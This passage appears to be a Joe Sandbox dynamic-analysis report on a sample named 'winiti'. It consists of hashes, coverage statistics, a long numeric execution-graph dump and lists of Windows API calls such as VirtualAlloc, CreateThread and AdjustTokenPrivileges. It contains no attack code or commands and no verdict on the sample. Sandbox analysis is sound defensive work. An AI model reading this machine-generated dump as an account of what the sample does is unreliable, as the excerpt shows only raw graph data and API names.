                  • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                  • Instruction ID: 28386c967f9631685869d8790586bd37d486a07ae1dbea4e103c843acdc23c49
                  • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                  • Instruction Fuzzy Hash:

                  Execution Graph

                  Execution Coverage: 6.6%
                  Dynamic/Decrypted Code Coverage: 0%
                  Signature Coverage: 0%
                  Total number of Nodes: 912
                  Total number of Limit Nodes: 26
                  execution_graph 15564 13f5ffe40 15565 13f5ffe5a 15564->15565 15566 13f5ffe65 15564->15566 15567 13f5ffe92 VirtualAlloc 15566->15567 15572 13f5ffee6 15566->15572 15568 13f5ffecd 15567->15568 15567->15572 15573 13f658fd0 15568->15573 15571 13f5fff31 VirtualFree 15571->15572 15576 13f658ed4 15573->15576 15577 13f658eee malloc 15576->15577 15578 13f5ffede 15577->15578 15579 13f658edf 15577->15579 15578->15571 15578->15572 15579->15577 15580 13f658efe 15579->15580 15581 13f658f09 15580->15581 15585 13f659a2c 15580->15585 15589 13f659a4c 15581->15589 15586 13f659a3a std::bad_alloc::bad_alloc 15585->15586 15593 13f65a8e0 15586->15593 15588 13f659a4b 15590 13f659a5a std::bad_alloc::bad_alloc 15589->15590 15591 13f65a8e0 Concurrency::cancel_current_task 2 API calls 15590->15591 15592 13f658f0f 15591->15592 15594 13f65a8ff 15593->15594 15595 13f65a928 RtlPcToFileHeader 15594->15595 15596 13f65a94a RaiseException 15594->15596 15597 13f65a940 15595->15597 15596->15588 15597->15596 15598 13f5f5760 15628 13f5fb020 FlsAlloc 15598->15628 15600 13f5f58ce 15601 13f5f576b 15601->15600 15641 13f5faec0 GetModuleHandleExW 15601->15641 15603 13f5f578b 15642 13f5f7110 15603->15642 15605 13f5f5793 15605->15600 15650 13f5fb750 15605->15650 15609 13f5f57b0 15609->15600 15610 13f5f57d8 RtlAddVectoredExceptionHandler 15609->15610 15611 13f5f57ec 15610->15611 15612 13f5f57f1 15610->15612 15614 13f5f5825 15611->15614 15615 13f5fd7b0 9 API calls 15611->15615 15687 13f5fd7b0 15612->15687 15616 13f5f587f 15614->15616 15664 13f5fdf20 15614->15664 15615->15614 15672 13f5f9f40 15616->15672 15619 13f5f5884 15619->15600 15693 13f5f5410 15619->15693 15629 13f5fb040 15628->15629 15630 13f5fb16e 15628->15630 15704 13f603910 15629->15704 15630->15601 15632 13f5fb045 15633 13f6026b0 10 API calls 15632->15633 15634 13f5fb04a 15633->15634 15634->15630 15635 13f5fd7b0 9 API calls 15634->15635 15636 13f5fb072 15635->15636 15637 13f5fb09a GetCurrentProcess GetProcessAffinityMask 15636->15637 
15638 13f5fb091 15636->15638 15640 13f5fb108 15636->15640 15637->15638 15639 13f5fb0e4 QueryInformationJobObject 15638->15639 15639->15640 15640->15601 15641->15603 15643 13f658fd0 _swprintf_c_l 3 API calls 15642->15643 15644 13f5f7125 15643->15644 15645 13f5f7164 15644->15645 15857 13f5ffdc0 15644->15857 15645->15605 15647 13f5f7132 15647->15645 15648 13f5fb410 InitializeCriticalSectionEx 15647->15648 15649 13f5f715d 15648->15649 15649->15605 15651 13f5fb410 InitializeCriticalSectionEx 15650->15651 15652 13f5f57a0 15651->15652 15652->15600 15653 13f5f6b50 15652->15653 15654 13f658fd0 _swprintf_c_l 3 API calls 15653->15654 15655 13f5f6b6e 15654->15655 15656 13f5f6c0a 15655->15656 15860 13f5f4d60 15655->15860 15656->15609 15658 13f5f6ba0 15659 13f5f6bea 15658->15659 15867 13f5f4e50 15658->15867 15659->15609 15661 13f5f6bad 15663 13f5f6bbd ISource 15661->15663 15871 13f5f4be0 15661->15871 15663->15609 15665 13f5fdf4b 15664->15665 15671 13f5fdff6 15664->15671 15666 13f658fd0 _swprintf_c_l 3 API calls 15665->15666 15667 13f5fdf6a 15666->15667 15668 13f5fb410 InitializeCriticalSectionEx 15667->15668 15669 13f5fdf95 15668->15669 15670 13f5fdfde GetSystemTimeAsFileTime 15669->15670 15670->15671 15671->15616 15673 13f6589ab 15672->15673 15674 13f5f9f79 EventRegister 15673->15674 15675 13f5f9ffc 15674->15675 15677 13f5f9ff7 15674->15677 15676 13f5fd7b0 9 API calls 15675->15676 15676->15677 15876 13f5fa820 15677->15876 15680 13f5fa074 15680->15619 15681 13f5fa04b 15681->15680 15894 13f5f6960 15681->15894 15683 13f5fa054 15683->15680 15901 13f5fe9d0 15683->15901 15684 13f5fa064 15684->15619 15690 13f5fd820 15687->15690 15688 13f658fb0 8 API calls 15691 13f5fd99d 15688->15691 15689 13f5fd8a0 _wcsicmp 15689->15690 15692 13f5fd8bd 15689->15692 15690->15689 15690->15692 15691->15611 15692->15688 15697 13f5f543a 15693->15697 15701 13f5f559b 15693->15701 15694 13f5f5726 15694->15600 15702 13f5fb410 15694->15702 15696 13f5f571a RaiseFailFastException 15696->15694 15697->15701 16181 
13f5fb1d0 LoadLibraryExW 15697->16181 15699 13f5f5516 15699->15701 16184 13f5fb180 LoadLibraryExW 15699->16184 15701->15694 16187 13f5fb220 15701->16187 15703 13f658bd9 InitializeCriticalSectionEx 15702->15703 15831 13f5f9b90 15704->15831 15707 13f5f9b90 9 API calls 15708 13f60394e 15707->15708 15709 13f5f9b90 9 API calls 15708->15709 15710 13f603969 15709->15710 15711 13f5f9b90 9 API calls 15710->15711 15712 13f603984 15711->15712 15713 13f5f9b90 9 API calls 15712->15713 15714 13f6039a4 15713->15714 15715 13f5f9b90 9 API calls 15714->15715 15716 13f6039bf 15715->15716 15717 13f5f9b90 9 API calls 15716->15717 15718 13f6039df 15717->15718 15719 13f5f9b90 9 API calls 15718->15719 15720 13f6039fa 15719->15720 15721 13f5f9b90 9 API calls 15720->15721 15722 13f603a15 15721->15722 15723 13f5f9b90 9 API calls 15722->15723 15724 13f603a30 15723->15724 15725 13f5f9b90 9 API calls 15724->15725 15726 13f603a50 15725->15726 15727 13f5f9b90 9 API calls 15726->15727 15728 13f603a70 15727->15728 15837 13f5f9d50 15728->15837 15731 13f5f9d50 9 API calls 15732 13f603aa0 15731->15732 15733 13f5f9d50 9 API calls 15732->15733 15734 13f603ab5 15733->15734 15735 13f5f9d50 9 API calls 15734->15735 15736 13f603aca 15735->15736 15737 13f5f9d50 9 API calls 15736->15737 15738 13f603adf 15737->15738 15739 13f5f9d50 9 API calls 15738->15739 15740 13f603af9 15739->15740 15741 13f5f9d50 9 API calls 15740->15741 15742 13f603b0e 15741->15742 15743 13f5f9d50 9 API calls 15742->15743 15744 13f603b23 15743->15744 15745 13f5f9d50 9 API calls 15744->15745 15746 13f603b38 15745->15746 15747 13f5f9d50 9 API calls 15746->15747 15748 13f603b4d 15747->15748 15749 13f5f9d50 9 API calls 15748->15749 15750 13f603b62 15749->15750 15751 13f5f9d50 9 API calls 15750->15751 15752 13f603b77 15751->15752 15753 13f5f9d50 9 API calls 15752->15753 15754 13f603b91 15753->15754 15755 13f5f9d50 9 API calls 15754->15755 15756 13f603bab 15755->15756 15757 13f5f9d50 9 API calls 15756->15757 15758 13f603bc0 15757->15758 15759 
13f5f9d50 9 API calls 15758->15759 15760 13f603bd5 15759->15760 15761 13f5f9d50 9 API calls 15760->15761 15762 13f603bea 15761->15762 15763 13f5f9d50 9 API calls 15762->15763 15764 13f603bff 15763->15764 15765 13f5f9d50 9 API calls 15764->15765 15766 13f603c19 15765->15766 15767 13f5f9d50 9 API calls 15766->15767 15768 13f603c33 15767->15768 15769 13f5f9d50 9 API calls 15768->15769 15770 13f603c48 15769->15770 15771 13f5f9d50 9 API calls 15770->15771 15772 13f603c5d 15771->15772 15773 13f5f9d50 9 API calls 15772->15773 15774 13f603c72 15773->15774 15775 13f5f9d50 9 API calls 15774->15775 15776 13f603c87 15775->15776 15777 13f5f9d50 9 API calls 15776->15777 15778 13f603c9c 15777->15778 15779 13f5f9d50 9 API calls 15778->15779 15780 13f603cb1 15779->15780 15781 13f5f9d50 9 API calls 15780->15781 15782 13f603cc6 15781->15782 15783 13f5f9d50 9 API calls 15782->15783 15784 13f603cdb 15783->15784 15785 13f5f9d50 9 API calls 15784->15785 15786 13f603cf0 15785->15786 15787 13f5f9d50 9 API calls 15786->15787 15788 13f603d05 15787->15788 15789 13f5f9d50 9 API calls 15788->15789 15790 13f603d1a 15789->15790 15791 13f5f9d50 9 API calls 15790->15791 15792 13f603d2f 15791->15792 15793 13f5f9d50 9 API calls 15792->15793 15794 13f603d44 15793->15794 15795 13f5f9d50 9 API calls 15794->15795 15796 13f603d59 15795->15796 15797 13f5f9d50 9 API calls 15796->15797 15798 13f603d6e 15797->15798 15799 13f5f9d50 9 API calls 15798->15799 15800 13f603d83 15799->15800 15801 13f5f9d50 9 API calls 15800->15801 15802 13f603d98 15801->15802 15803 13f5f9d50 9 API calls 15802->15803 15804 13f603dad 15803->15804 15805 13f5f9d50 9 API calls 15804->15805 15806 13f603dc2 15805->15806 15807 13f5f9d50 9 API calls 15806->15807 15808 13f603dd7 15807->15808 15809 13f5f9d50 9 API calls 15808->15809 15810 13f603dec 15809->15810 15811 13f5f9d50 9 API calls 15810->15811 15812 13f603e01 15811->15812 15813 13f5f9d50 9 API calls 15812->15813 15814 13f603e16 15813->15814 15815 13f5f9d50 9 API calls 15814->15815 
15816 13f603e30 15815->15816 15817 13f5f9d50 9 API calls 15816->15817 15818 13f603e4a 15817->15818 15819 13f5f9d50 9 API calls 15818->15819 15820 13f603e64 15819->15820 15821 13f5f9d50 9 API calls 15820->15821 15822 13f603e7e 15821->15822 15823 13f5f9d50 9 API calls 15822->15823 15824 13f603e98 15823->15824 15825 13f5f9d50 9 API calls 15824->15825 15826 13f603eb2 15825->15826 15827 13f5f9d50 9 API calls 15826->15827 15828 13f603ec7 15827->15828 15829 13f5f9d50 9 API calls 15828->15829 15830 13f603ee1 15829->15830 15832 13f5f9bc3 15831->15832 15833 13f5f9bc7 15832->15833 15836 13f5fd7b0 9 API calls 15832->15836 15843 13f658fb0 15833->15843 15836->15833 15840 13f5f9d80 15837->15840 15838 13f5fd7b0 9 API calls 15839 13f5f9e98 15838->15839 15841 13f658fb0 8 API calls 15839->15841 15840->15838 15840->15840 15842 13f5f9eb0 15841->15842 15842->15731 15844 13f658fb9 15843->15844 15845 13f5f9cfe 15844->15845 15846 13f659abc IsProcessorFeaturePresent 15844->15846 15845->15707 15847 13f659ad4 15846->15847 15852 13f659b90 RtlCaptureContext 15847->15852 15853 13f659baa RtlLookupFunctionEntry 15852->15853 15854 13f659bc0 RtlVirtualUnwind 15853->15854 15855 13f659ae7 15853->15855 15854->15853 15854->15855 15856 13f659a88 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 15855->15856 15858 13f5fb410 InitializeCriticalSectionEx 15857->15858 15859 13f5ffe0c 15858->15859 15859->15647 15861 13f658fd0 _swprintf_c_l 3 API calls 15860->15861 15862 13f5f4d7e 15861->15862 15863 13f5fb410 InitializeCriticalSectionEx 15862->15863 15865 13f5f4db0 15862->15865 15863->15865 15864 13f5f4e08 ISource 15864->15658 15865->15864 15874 13f5fb3f0 15865->15874 15868 13f5f4e66 ISource 15867->15868 15869 13f5f4e55 15867->15869 15868->15661 15870 13f5fb3f0 DeleteCriticalSection 15869->15870 15870->15868 15872 13f5fb3f0 15871->15872 15872->15663 15873 13f658a4d DeleteCriticalSection 15872->15873 15874->15864 15875 13f658a4d DeleteCriticalSection 15874->15875 15911 
13f601d60 15876->15911 15878 13f5fa037 15878->15680 15879 13f609140 15878->15879 15922 13f5fe020 15879->15922 15883 13f60915e 15884 13f6091d9 15883->15884 15929 13f602260 15883->15929 15893 13f60944b ISource 15884->15893 15943 13f61f640 15884->15943 15887 13f60964c 15888 13f658fd0 _swprintf_c_l 3 API calls 15887->15888 15887->15893 15889 13f609782 15888->15889 15889->15893 15966 13f601eb0 15889->15966 15891 13f6097ad 15971 13f61de20 15891->15971 15893->15681 15895 13f5f6972 15894->15895 15896 13f5f69ad 15895->15896 16158 13f5ffc70 CreateEventW 15895->16158 15896->15683 15898 13f5f6984 15898->15896 16159 13f5fb320 CreateThread 15898->16159 15900 13f5f69a3 15900->15683 15902 13f5fe9e7 15901->15902 15903 13f5fe9ef 15902->15903 15904 13f658fd0 _swprintf_c_l 3 API calls 15902->15904 15903->15684 15908 13f5fea21 15904->15908 15905 13f5feb58 ISource 15905->15684 15907 13f5feaf2 ISource 15907->15684 15908->15905 15909 13f5feab5 ISource 15908->15909 16162 13f604350 15908->16162 15909->15907 16168 13f6045e0 15909->16168 15916 13f604c20 15911->15916 15915 13f601d9f 15915->15878 15917 13f658fd0 _swprintf_c_l 3 API calls 15916->15917 15918 13f601d88 15917->15918 15918->15915 15919 13f606770 15918->15919 15920 13f658fd0 _swprintf_c_l 3 API calls 15919->15920 15921 13f606785 15920->15921 15921->15915 15923 13f5fe0cc 15922->15923 15925 13f5fe05b 15922->15925 15928 13f6028a0 QueryPerformanceFrequency 15923->15928 15925->15923 15927 13f5fe094 15925->15927 15994 13f5fdd40 15925->15994 15927->15923 16002 13f5fe0e0 15927->16002 15928->15883 15930 13f602283 15929->15930 15931 13f602297 GetCurrentProcess IsProcessInJob 15930->15931 15937 13f6023d4 15930->15937 15932 13f602393 15931->15932 15933 13f6022ec 15931->15933 15932->15937 15938 13f6023ab GlobalMemoryStatusEx 15932->15938 15933->15932 15936 13f6022f6 QueryInformationJobObject 15933->15936 15934 13f602422 GlobalMemoryStatusEx 15935 13f602418 15934->15935 15939 13f658fb0 8 API calls 15935->15939 15936->15932 15940 13f602318 
15936->15940 15937->15934 15937->15935 15938->15937 15941 13f602464 15939->15941 15940->15932 15942 13f60235c GlobalMemoryStatusEx 15940->15942 15941->15884 15942->15932 16011 13f6028f0 VirtualAlloc 15943->16011 15945 13f61f662 15946 13f61f6c7 15945->15946 16087 13f602690 InitializeCriticalSection 15945->16087 15948 13f61fabd 15946->15948 16014 13f630410 15946->16014 15950 13f61f6f1 _swprintf_c_l 15965 13f61f933 15950->15965 16024 13f61f340 15950->16024 15952 13f61f8c8 16028 13f61ce10 15952->16028 15956 13f61f902 15956->15965 16035 13f61fae0 15956->16035 15959 13f61f928 16088 13f6029e0 VirtualFree 15959->16088 15961 13f61f957 15961->15965 16049 13f6330a0 15961->16049 15965->15887 15967 13f658fd0 _swprintf_c_l 3 API calls 15966->15967 15968 13f601ed6 15967->15968 15969 13f601ede CreateEventW 15968->15969 15970 13f601f00 ISource 15968->15970 15969->15970 15970->15891 15972 13f61deaa _swprintf_c_l 15971->15972 15973 13f601eb0 4 API calls 15972->15973 15974 13f61deb8 15973->15974 15984 13f61e717 15974->15984 16136 13f602880 QueryPerformanceCounter 15974->16136 15977 13f61ded6 15978 13f61e246 15977->15978 15977->15984 16137 13f621660 15977->16137 15979 13f621660 9 API calls 15978->15979 15980 13f61e279 15979->15980 15981 13f621660 9 API calls 15980->15981 15980->15984 15982 13f61e2b8 15981->15982 15983 13f658fd0 _swprintf_c_l 3 API calls 15982->15983 15982->15984 15985 13f61e581 15983->15985 15984->15893 15985->15984 15986 13f61e5e4 15985->15986 15987 13f61e5cd 15985->15987 15988 13f658fd0 _swprintf_c_l 3 API calls 15986->15988 15987->15984 15990 13f61e5da DebugBreak 15987->15990 15989 13f61e630 15988->15989 15989->15984 15991 13f658fd0 _swprintf_c_l 3 API calls 15989->15991 15990->15984 15992 13f61e6bd 15991->15992 15992->15984 16151 13f602690 InitializeCriticalSection 15992->16151 15997 13f5fdd64 15994->15997 15995 13f658fd0 _swprintf_c_l 3 API calls 15996 13f5fddcd 15995->15996 15998 13f658fd0 _swprintf_c_l 3 API calls 15996->15998 16001 13f5fde85 ISource 
15996->16001 15997->15995 15999 13f5fddf8 15997->15999 15998->15999 15999->16001 16006 13f5faea0 GetCurrentThreadId 15999->16006 16001->15927 16003 13f5fe13c 16002->16003 16004 13f5fe135 16002->16004 16003->15923 16007 13f5fdb70 16004->16007 16006->16001 16008 13f5fdb9a _swprintf_c_l 16007->16008 16009 13f658fd0 _swprintf_c_l 3 API calls 16008->16009 16010 13f5fdbc1 16008->16010 16009->16010 16010->16003 16012 13f602911 VirtualFree 16011->16012 16013 13f602929 16011->16013 16012->15945 16013->15945 16018 13f63043f 16014->16018 16015 13f630462 16089 13f602a80 16015->16089 16016 13f63046c 16017 13f602a00 3 API calls 16016->16017 16021 13f63047d 16017->16021 16018->16015 16018->16016 16022 13f630497 16018->16022 16021->16022 16100 13f6029e0 VirtualFree 16021->16100 16022->15950 16026 13f61f35f 16024->16026 16027 13f61f37c 16026->16027 16101 13f601f70 16026->16101 16027->15952 16029 13f61ce32 16028->16029 16030 13f658fb0 8 API calls 16029->16030 16031 13f61cf53 16030->16031 16032 13f602a00 16031->16032 16033 13f602a44 GetCurrentProcess VirtualAllocExNuma 16032->16033 16034 13f602a25 VirtualAlloc 16032->16034 16033->15956 16034->16033 16041 13f61fb0e 16035->16041 16036 13f61fb18 16037 13f658fb0 8 API calls 16036->16037 16038 13f61f924 16037->16038 16038->15959 16038->15961 16039 13f61fec3 EnterCriticalSection 16040 13f61fef0 LeaveCriticalSection 16039->16040 16039->16041 16040->16041 16041->16036 16041->16039 16041->16040 16043 13f61ffe1 LeaveCriticalSection 16041->16043 16044 13f61ffb7 16041->16044 16108 13f602930 16041->16108 16046 13f61ffed 16043->16046 16045 13f61ffc0 EnterCriticalSection 16044->16045 16044->16046 16045->16043 16046->16036 16048 13f620025 EnterCriticalSection LeaveCriticalSection 16046->16048 16111 13f6029c0 VirtualFree 16046->16111 16048->16046 16112 13f632fb0 16049->16112 16052 13f61ed00 16058 13f61ed30 16052->16058 16053 13f61f311 16134 13f601e10 CloseHandle 16053->16134 16054 13f61f31d 16056 13f61f332 16054->16056 16057 13f61f326 16054->16057 
16056->15965 16135 13f601e10 CloseHandle 16057->16135 16060 13f601eb0 4 API calls 16058->16060 16085 13f61ed8f 16058->16085 16061 13f61edcf 16060->16061 16062 13f601eb0 4 API calls 16061->16062 16061->16085 16063 13f61ede5 _swprintf_c_l 16062->16063 16063->16085 16118 13f602080 16063->16118 16065 13f61f10a 16066 13f601eb0 4 API calls 16065->16066 16067 13f61f187 16066->16067 16068 13f61f1c9 16067->16068 16071 13f601eb0 4 API calls 16067->16071 16069 13f61f2c9 16068->16069 16070 13f61f2bd 16068->16070 16068->16085 16074 13f61f2d2 16069->16074 16075 13f61f2de 16069->16075 16130 13f601e10 CloseHandle 16070->16130 16072 13f61f19d 16071->16072 16072->16068 16125 13f601e30 16072->16125 16131 13f601e10 CloseHandle 16074->16131 16077 13f61f2f3 16075->16077 16078 13f61f2e7 16075->16078 16079 13f61f2fc 16077->16079 16077->16085 16132 13f601e10 CloseHandle 16078->16132 16133 13f601e10 CloseHandle 16079->16133 16083 13f61f1b3 16083->16068 16084 13f601eb0 4 API calls 16083->16084 16084->16068 16085->16053 16085->16054 16086 13f61f277 16085->16086 16086->15965 16087->15946 16088->15965 16090 13f602b46 GetLargePageMinimum 16089->16090 16091 13f602aae LookupPrivilegeValueW 16089->16091 16094 13f602b83 GetCurrentProcess VirtualAllocExNuma 16090->16094 16095 13f602b66 VirtualAlloc 16090->16095 16092 13f602aca GetCurrentProcess OpenProcessToken 16091->16092 16093 13f602b7f 16091->16093 16092->16093 16096 13f602b01 AdjustTokenPrivileges GetLastError CloseHandle 16092->16096 16097 13f658fb0 8 API calls 16093->16097 16094->16093 16095->16093 16096->16093 16098 13f602b3b 16096->16098 16099 13f602bb6 16097->16099 16098->16090 16098->16093 16099->16021 16100->16022 16102 13f601f78 16101->16102 16103 13f601f91 GetLogicalProcessorInformation 16102->16103 16107 13f601fbd ISource 16102->16107 16104 13f601fb2 GetLastError 16103->16104 16105 13f601fc4 16103->16105 16104->16105 16104->16107 16106 13f602001 GetLogicalProcessorInformation 16105->16106 16105->16107 16106->16107 16107->16027 16109 
13f60294b VirtualAlloc 16108->16109 16110 13f60296e GetCurrentProcess VirtualAllocExNuma 16108->16110 16109->16041 16110->16041 16111->16046 16113 13f632fc9 16112->16113 16117 13f61fa9c 16112->16117 16114 13f632fe4 LoadLibraryExW 16113->16114 16113->16117 16115 13f633012 GetProcAddress 16114->16115 16114->16117 16116 13f633027 16115->16116 16116->16117 16117->16052 16119 13f6020b7 GetCurrentProcess 16118->16119 16120 13f60216f GlobalMemoryStatusEx 16118->16120 16121 13f6020d0 16119->16121 16123 13f6020d8 16120->16123 16121->16120 16121->16123 16122 13f658fb0 8 API calls 16124 13f602248 16122->16124 16123->16122 16124->16065 16126 13f658fd0 _swprintf_c_l 3 API calls 16125->16126 16127 13f601e56 16126->16127 16128 13f601e5e CreateEventW 16127->16128 16129 13f601e7e ISource 16127->16129 16128->16129 16129->16083 16130->16069 16131->16075 16132->16077 16133->16085 16134->16054 16135->16056 16136->15977 16138 13f62168d 16137->16138 16139 13f6216e3 EnterCriticalSection 16138->16139 16141 13f621767 16138->16141 16143 13f621700 16139->16143 16140 13f6217c1 16152 13f61e7a0 16140->16152 16141->16140 16144 13f602930 3 API calls 16141->16144 16142 13f6217b1 LeaveCriticalSection 16145 13f6217bd 16142->16145 16143->16142 16147 13f621745 LeaveCriticalSection 16143->16147 16148 13f62178d 16144->16148 16145->15977 16147->16141 16148->16140 16149 13f621791 16148->16149 16149->16145 16150 13f62179b EnterCriticalSection 16149->16150 16150->16142 16151->15984 16153 13f61e7d1 16152->16153 16154 13f61e965 16153->16154 16155 13f61e954 16153->16155 16156 13f61e94f DebugBreak 16153->16156 16154->16145 16155->16154 16157 13f61e960 DebugBreak 16155->16157 16156->16155 16157->16154 16158->15898 16160 13f5fb34f 16159->16160 16161 13f5fb355 SetThreadPriority ResumeThread CloseHandle 16159->16161 16160->15900 16161->15900 16163 13f604383 _swprintf_c_l 16162->16163 16167 13f6043a9 ISource _swprintf_c_l 16163->16167 16171 13f605300 16163->16171 16165 13f6043a0 16166 13f5fb410 
InitializeCriticalSectionEx 16165->16166 16165->16167 16166->16167 16167->15908 16167->16167 16169 13f5fb3f0 DeleteCriticalSection 16168->16169 16170 13f6045f2 16169->16170 16172 13f602a00 3 API calls 16171->16172 16173 13f605322 16172->16173 16174 13f60532a 16173->16174 16175 13f602930 3 API calls 16173->16175 16174->16165 16176 13f605348 16175->16176 16179 13f605353 _swprintf_c_l 16176->16179 16180 13f6029e0 VirtualFree 16176->16180 16178 13f60546e 16178->16165 16179->16165 16180->16178 16182 13f5fb1ee GetProcAddress 16181->16182 16183 13f5fb203 16181->16183 16182->16183 16183->15699 16185 13f5fb19e GetProcAddress 16184->16185 16186 13f5fb1b3 16184->16186 16185->16186 16186->15701 16188 13f5fb234 16187->16188 16188->16188 16189 13f5fb23d GetStdHandle WriteFile 16188->16189 16189->15696 16190 13f5f9500 16191 13f5f951f 16190->16191 16192 13f5f9542 16191->16192 16202 13f5fb2e0 CreateThread 16191->16202 16194 13f5f9534 16195 13f5f953d 16194->16195 16196 13f5f9549 16194->16196 16205 13f5ffc10 16195->16205 16209 13f5ffcf0 16196->16209 16199 13f5f9559 16200 13f5ffc10 CloseHandle 16199->16200 16201 13f5f9563 16200->16201 16203 13f5fb309 CloseHandle 16202->16203 16204 13f5fb304 16202->16204 16203->16194 16204->16194 16206 13f5ffc1f 16205->16206 16207 13f5ffc34 16205->16207 16206->16207 16208 13f5ffc28 CloseHandle 16206->16208 16207->16192 16208->16207 16210 13f5ffd1d 16209->16210 16211 13f5ffd77 16209->16211 16212 13f5ffd9e 16210->16212 16214 13f5ffd58 16210->16214 16211->16199 16213 13f5fad00 4 API calls 16212->16213 16213->16211 16216 13f5fad00 16214->16216 16217 13f5fad3c SetLastError CoWaitForMultipleHandles 16216->16217 16218 13f5fad25 WaitForMultipleObjectsEx 16216->16218 16219 13f5fad6a 16217->16219 16220 13f5fad7e 16217->16220 16218->16220 16219->16220 16221 13f5fad6e SetLastError 16219->16221 16220->16211 16221->16220 16222 13f5f6620 16227 13f5f6645 16222->16227 16223 13f5f6659 16224 13f5f671f 16225 13f5f673f 16224->16225 16226 13f5f6726 16224->16226 16230 
13f5f676f 16225->16230 16244 13f5f63b0 GetLastError 16225->16244 16229 13f5fb220 2 API calls 16226->16229 16227->16223 16227->16224 16232 13f5f66c8 16227->16232 16233 13f5f66e7 16227->16233 16236 13f5f6706 16227->16236 16231 13f5f6732 RaiseFailFastException 16229->16231 16231->16225 16235 13f5f66d0 Sleep 16232->16235 16233->16236 16237 13f5f66f9 RaiseFailFastException 16233->16237 16235->16233 16235->16235 16238 13f5f4c30 16236->16238 16237->16236 16239 13f5f4c56 16238->16239 16243 13f5f4c74 16239->16243 16247 13f5facc0 FlsGetValue 16239->16247 16241 13f5f4c6c 16242 13f5f5920 6 API calls 16241->16242 16242->16243 16243->16224 16245 13f5f63e0 16244->16245 16246 13f5f6406 SetLastError 16245->16246 16248 13f5facda RaiseFailFastException 16247->16248 16249 13f5face8 FlsSetValue 16247->16249 16248->16249 16250 13f5f9480 16251 13f5f949f 16250->16251 16252 13f5f9498 16250->16252 16266 13f5f62a0 16251->16266 16260 13f5f4cc0 16252->16260 16255 13f5f94bc 16275 13f5ffcc0 16255->16275 16257 13f5f94cc 16278 13f5fe1d0 16257->16278 16261 13f5f4ced 16260->16261 16262 13f5facc0 3 API calls 16261->16262 16265 13f5f4d0b 16261->16265 16263 13f5f4d03 16262->16263 16284 13f5f5920 16263->16284 16265->16251 16267 13f5f62b8 GetCurrentThreadId GetCurrentProcess GetCurrentThread DuplicateHandle 16266->16267 16268 13f5f6366 16266->16268 16269 13f5faa30 VirtualQuery 16267->16269 16268->16255 16270 13f5f632c 16269->16270 16271 13f5f633a RaiseFailFastException 16270->16271 16272 13f5f6347 16270->16272 16271->16272 16273 13f5fdcc0 4 API calls 16272->16273 16274 13f5f634f 16273->16274 16274->16255 16276 13f5ffcca 16275->16276 16277 13f5ffcd1 SetEvent 16275->16277 16276->16257 16277->16257 16280 13f5fe20a 16278->16280 16282 13f5fe22f _swprintf_c_l 16278->16282 16279 13f5f94d6 16280->16279 16281 13f5fdd40 4 API calls 16280->16281 16281->16282 16282->16279 16283 13f658fd0 _swprintf_c_l 3 API calls 16282->16283 16283->16282 16285 13f5f594f 16284->16285 16292 13f5faa30 VirtualQuery 16285->16292 16288 
Control-flow graph (rendered graph data, not reproduced here): call and branch edges between basic blocks at 13f5f59a0 through 13f6307f5. API call sites visible in the graph: RaiseFailFastException, QueryPerformanceCounter, SwitchToThread, SetEvent, ResetEvent, EventEnabled, EventWrite, FlushProcessWriteBuffers, LoadLibraryExW, GetProcAddress, GetLastError, SuspendThread, GetThreadContext, ResumeThread, EnterCriticalSection, LeaveCriticalSection, DebugBreak, VirtualAlloc, VirtualUnlock, VirtualFree, WaitForSingleObject, SleepEx, GetTickCount64, _swprintf_c_l.

                  Control-flow Graph

                  APIs
                    • Part of subcall function 000000013F5FB020: FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,000000013F5F576B), ref: 000000013F5FB02B
                    • Part of subcall function 000000013F5FB020: QueryInformationJobObject.KERNEL32 ref: 000000013F5FB0FE
                    • Part of subcall function 000000013F5FAEC0: GetModuleHandleExW.KERNEL32(?,?,?,?,000000013F5F3819), ref: 000000013F5FAED1
                  • RtlAddVectoredExceptionHandler.NTDLL ref: 000000013F5F57D8
                    • Part of subcall function 000000013F5FD7B0: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F5FD8AD
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: AllocExceptionHandleHandlerInformationModuleObjectQueryVectored_wcsicmp
                  • String ID: StressLogLevel$TotalStressLogSize
                  • API String ID: 2876344857-4058818204
                  • Opcode ID: b8dcc97092589a3276693584986118e267024c8b20105f4c83ed43bccf9c10d3
                  • Instruction ID: 24b4dd3771dca8d0ee0ffc585fa9c8cca617629fed13a26e2f0b721e2424645b
                  • Opcode Fuzzy Hash: b8dcc97092589a3276693584986118e267024c8b20105f4c83ed43bccf9c10d3
                  • Instruction Fuzzy Hash: 12418F32E20B40C2FA45AF20E4057D97791EB81788F5950B9EE491B69ADB74DB0FC780

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: GlobalMemoryStatus$Process$CurrentInformationObjectQuery
                  • String ID: @$@$@
                  • API String ID: 2645093340-1177533131
                  • Opcode ID: ca88b2e47b65645c36c042b4dc4072e1c75f948b70b361a8b6e96ed663280510
                  • Instruction ID: 46e77daee8be629534e7fbb8e4f7f9b7c1e76057e2711fbd4e5fd337285e7d02
